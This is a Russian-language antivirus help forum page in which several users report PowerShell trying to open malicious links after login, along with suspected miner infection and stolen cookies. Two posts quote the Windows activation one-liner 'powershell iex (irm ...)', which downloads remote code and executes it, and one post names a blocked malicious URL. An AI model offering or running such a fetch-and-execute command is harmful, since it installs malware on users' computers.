[РЕШЕНО] Наличие вируса/автозагрузка майнера на компьютере.
-
Похожий контент
-
Автор VanyeJ
Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.
Событие: Остановлен переход на сайт
Пользователь: WIN-O4R3Q0UCBR5\User
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название:
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту:
Причина: Облачная защита
Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
CollectionLog-2025.02.08-15.48.zip
-
Автор mrTomny
Вопрос не решился? у меня такая же проблема вылезла....
инфо.txt
Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
-
Автор Snake200221
Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует
Также недавно активировал систему командой в сmd, а именно "powershell iex (irm 'activated.run/key')". Может быть это она спровоцировала данную проблему
CollectionLog-2025.01.04-00.02.zip
-
Автор mixedust
Вообщем,касперский мне постоянно присылает уведомления, что загрузка остановлена и название файла или отменён переход по вредоностной ссылке. Я и пытался в расширениях что то найти и вредоностное приложение найти в панели задач и делал проверку пк, но ничего не нашёл. Не понимаю, почему касперский сам не утранит причину этого всего (у меня лицензия)
Сообщение от модератора Mark D. Pearlstone Внимательно читайте правил разделов! Евгений Касперский не помогает вылечиться от вирусов и не оказывает компьютерную помощь. -
Автор webiis
Здравствуйте, уважаемые форумчане!
Две недели назад столкнулся с атакой на свой пк, украли (если я правильно понял) все куки браузера. После чего, начали приходить уведомления о входе в аккаунты с неизвестных устройств.
Я сменил все пароли, почистил куки и кэш браузера, просканировали компьютер утилитой dr.web cureit, а после установил пробную версию Касперского, и так же удалил все найденные вирусы.
Сейчас, постоянно всплывает уведомление, что "Переход остановлен - Название: https://www.ippfinfo.top/jsapi.php". Также, не устанавливаются обновления windows и не скачиваются приложения из microsoft store.
Помогите решить проблему.
CollectionLog-2023.03.27-10.44.zip 27.03.2023.txt
-
Рекомендуемые сообщения